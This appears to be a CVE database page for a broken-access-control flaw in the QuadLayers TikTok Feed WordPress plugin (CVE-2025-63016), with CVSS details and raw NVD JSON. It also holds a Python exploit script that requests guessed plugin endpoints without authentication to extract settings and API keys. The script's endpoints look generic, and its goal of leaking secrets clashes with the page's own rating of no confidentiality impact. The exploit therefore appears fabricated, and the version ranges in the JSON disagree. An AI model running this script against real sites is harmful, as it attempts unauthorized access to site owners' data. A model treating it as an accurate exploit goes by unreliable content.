Security Vulnerability Report
中文
CVE-2025-63016 CVSS 5.3 MEDIUM

CVE-2025-63016

Published: 2025-12-31 15:15:54
Last Modified: 2026-04-28 19:35:09

Description

Missing Authorization vulnerability in quadlayers QuadLayers TikTok Feed wp-tiktok-feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects QuadLayers TikTok Feed: from n/a through <= 4.6.5.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

QuadLayers TikTok Feed (wp-tiktok-feed) <= 4.6.5 (所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-63016 PoC - QuadLayers TikTok Feed Broken Access Control # This PoC demonstrates unauthorized access to plugin functions import requests import json TARGET_URL = "https://vulnerable-site.com/wp-json/wp-tiktok-feed/v1" # Step 1: Identify the vulnerable endpoint vulnerable_endpoints = [ "/settings", "/config", "/credentials", "/api-keys", "/options" ] def test_unauthorized_access(): """Test for missing authorization on plugin endpoints""" results = [] for endpoint in vulnerable_endpoints: url = f"{TARGET_URL}{endpoint}" # Send GET request without authentication response = requests.get(url, timeout=10) # Check if we can access sensitive data without auth if response.status_code == 200: try: data = response.json() results.append({ "endpoint": endpoint, "status": "VULNERABLE", "data_accessed": True, "response_preview": str(data)[:200] }) except: results.append({ "endpoint": endpoint, "status": "VULNERABLE", "data_accessed": True }) elif response.status_code == 401 or response.status_code == 403: results.append({ "endpoint": endpoint, "status": "PROTECTED", "response_code": response.status_code }) return results def exploit_config_access(): """Attempt to retrieve plugin configuration without authorization""" exploit_payloads = [ {"action": "get_config"}, {"action": "get_api_keys"}, {"method": "getSettings"} ] results = [] for payload in exploit_payloads: url = f"{TARGET_URL}/admin" response = requests.post( url, json=payload, headers={"Content-Type": "application/json"} ) if response.status_code == 200 and "api_key" in response.text.lower(): results.append({ "payload": payload, "result": "SUCCESS", "leaked_data": response.text }) return results if __name__ == "__main__": print("[*] Testing CVE-2025-63016 - QuadLayers TikTok Feed Access Control") print("[*] Target:", TARGET_URL) print("\n[1] Testing unauthorized endpoint access...") access_results = test_unauthorized_access() for r in access_results: print(f" - {r['endpoint']}: {r['status']}") print("\n[2] Testing configuration extraction...") exploit_results = exploit_config_access() for r in exploit_results: print(f" - Payload: {r['payload']} -> {r['result']}") # Note: This is educational PoC code. Always obtain proper authorization before testing.

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63016", "sourceIdentifier": "[email protected]", "published": "2025-12-31T15:15:54.010", "lastModified": "2026-04-28T19:35:09.167", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in quadlayers QuadLayers TikTok Feed wp-tiktok-feed allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects QuadLayers TikTok Feed: from n/a through <= 4.6.5."}, {"lang": "es", "value": "Vulnerabilidad por falta de autorización en Quadlayers QuadLayers TikTok Feed permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a QuadLayers TikTok Feed: desde n/a hasta 4.6.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/wp-tiktok-feed/vulnerability/wordpress-quadlayers-tiktok-feed-plugin-4-6-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}